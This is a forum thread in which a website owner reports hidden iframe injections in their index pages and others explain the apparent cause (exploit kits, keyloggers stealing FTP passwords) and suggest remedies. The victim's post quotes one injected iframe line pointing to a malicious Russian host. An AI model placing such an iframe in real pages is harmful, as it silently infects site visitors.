So awhile ago on a random day, my website suddenly appeared with a blank page. I replaced all my files on the server and it was working again. However, this constantly happens over time, maybe 1-2 a week. Something is added these kinds of codes to my index files: <iframe src="http://x0v.ru:8080/index.php" width=153 height=138 style="visibility: hidden"></iframe> PHP: This causes visitors to my site to download a virus. This is very frustrating, any help would be great on this issue! I have scanned my backup files with kaspersky and it seems clean, I thought it was my VPS, but then I switch to another host and the same thing happens!
And it spreads and it spreads... I will post this once again (whether anyone listens to the new guy or not is up to them) "How does this hacking takes place: This hacking does not takes place by any PHP application vulnerability nor any kernel bug nor apache bug nor cpanel or Plesk bug. How it's done The hacker(s) are setting up innocent looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, firefox and opera). The visitor is unaware that they may have a keylogger that sends the persons passwords ect to the hacker(s) and moves on. After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers infection site, where the person's computer will be injected and infected. And so the cycle continues Solution: Change the FTP password and it will usually stop. The only reason it wouldn't is if a keylogger is on your personal computer and since you change the password using the same computer, you just gave the passwords back to the hackers again. Just changing password is not complete solution but is the first step. Whats next, your password is leaked that means your computer is sending out the passwords, so I would suggest you to do a clean format first and then install any antivirus of spyware which you think could block it. But the best solution is to clean format the computer. If the innocent visitor has an ftp or root password for any internet sites, the hackers use a program that goes to the persons site(s) and instantly adds the hidden iframe to every index type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the ftp or root passwords to login. And since they have at least your account ftp pass, whatever permissions your folders and files are set to make no difference."
Okay well, I changed my pass but it is still occuring. I have just completed reformatting, so I will try changing it once again... if this doesn't work, does anyone else have an idea?
Had you cleaned it out prior? It's possible that your host is infected. This has been the case lately. ^ top secret information edit: may also want to try KeyScrambler-Personal found over at cnet. I would provide a link, but apparently I'm not allowed,
oh iv read another thread about that. but I think the hacker had my password to my main email, since i saw a weird email as the secondary email to mine... i reformatted, changed my secondary email, changed , my passwords... hopefully this is done